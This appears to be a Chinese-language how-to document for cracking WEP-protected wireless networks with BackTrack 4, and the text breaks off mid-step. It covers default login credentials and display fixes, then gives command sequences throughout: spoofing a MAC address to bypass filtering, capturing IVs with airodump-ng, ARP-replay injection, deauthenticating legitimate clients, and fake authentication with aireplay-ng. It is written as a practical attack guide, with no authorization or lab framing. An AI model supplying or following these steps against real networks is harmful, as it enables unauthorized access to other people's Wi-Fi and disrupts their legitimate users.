WEP(BT4)破解无线网.docx

WEP破解] BT4破解教程详细解答2.启动BT4，选console控制台模式，用户名root,密码toor注意不是root,再运行startx 启动窗口模式。BT4启动黑屏问题解决办法输入root toor 登录系统后在输入 fixvesa然后 startx如果不行就输入 fixvmware,然后输入startx.还是不能就输入Xorg -configure然后startx我的笔记本是三星R458的，启动BT4，startx时按住空格可以进入.。在输入用户名root 和密码toor 以后输入xconf 这时会黑屏一会，然后出来提示符再输入startx 可进入win窗口；当实在不能进入win窗口的时候你也可以直接在提示符下输入各破解命令，同时可用alt+f1 打开一个shell，alt+f2 打开第二个shell，alt+f3 打开第三个等。关闭窗口用PRINT SCREEN键---------------------end---------------------[] 可选 回显/ 或者() 提示---------------------WEP---------------------shell 1:----------------------------------------1.ifconfig -awlan0 ... xx:xx:xx:xx:xx:xx[macchanger -m 00:11:22:33:44:55 wlan0修改自己网卡的MAC 地址。当对方设置了MAC 地址过滤时或为了方便后面输入]2.ifconfig -a wlan0 up(可能要加载网卡才支持注入?)3.airmon-ng start wlan0 6monitor mode enabled on mon0(6是频道)另一说5100要支持注入用airmon-ng start wlan0如果这里回显(monitor mode enabled) 则下面命令所有端口号要用wlan0[aireplay-ng -9 mon0 / aireplay-ng --test mon0Injection is working/No anwser(注入攻击成功/不成功)(检测你的网卡是否支持注入)]4.airodump-ng -w pack -c 6 mon0/wlan0(pack是随便起的获取的ivs的保存文件的名字)xxxxxxx另一说用airodump-ng --ivs -w pack -c 6 mon0/wlan0shell 2:----------------------------------------一、有客户端：A.合法客户端产生大量有效的数据，能直接获得大量cap。收到10000以上data后，直接转shell 3,破解密码B.合法客户端只能产生少量数据，就需要注入-3攻击加速产生大量数据。5.aireplay-ng -3 -b 000000000000(APmac) -h 111111111111(合法客户端mac) mon0/wlan0(wlan0测试不行)Read 11542 packets got 12587 ARP ...,send 71524 packets ... 很多类似行C.合法客户端不在通信，注入模式不成功，用-0 冲突模式强制断开合法客户端和ap连接，使之重新连接，新连接所产生的握手数据让-3 获得有效的ARP从而完成ARP注入5.aireplay-ng -3 -b 000000000000(APmac) -h 111111111111(合法客户端mac) wlan06.aireplay-ng -0 10 -a 000000000000(APmac) -c 111111111111(合法客户端mac) wlan0(可能要另开窗)D.有客户端，并且客户端能产生有效arp 数据的另类破解方式输入modprobe –r iwl3945(加载网卡)输入modprobe ipwraw输入airmon-ng start wlan0 6现在，只要一个命令就搞定，输入:输入wesside-ng -i wlan0 -v 01:02:03:04:05:06此格式的APmac。key: 12:34:56:78:90二、无客户端：5.aireplay-ng -1 0 -a 000000000000(APmac) -h 111111111111(Mymac) mon0(我成功了)另一说用aireplay-ng -1 0 -e Kingnet -a (APmac) -h (Mymac) mon0/wlan0Authentication successfulAssociation successful(建立虚拟伪装连接)如果失败可尝试降低网卡速率后再试:i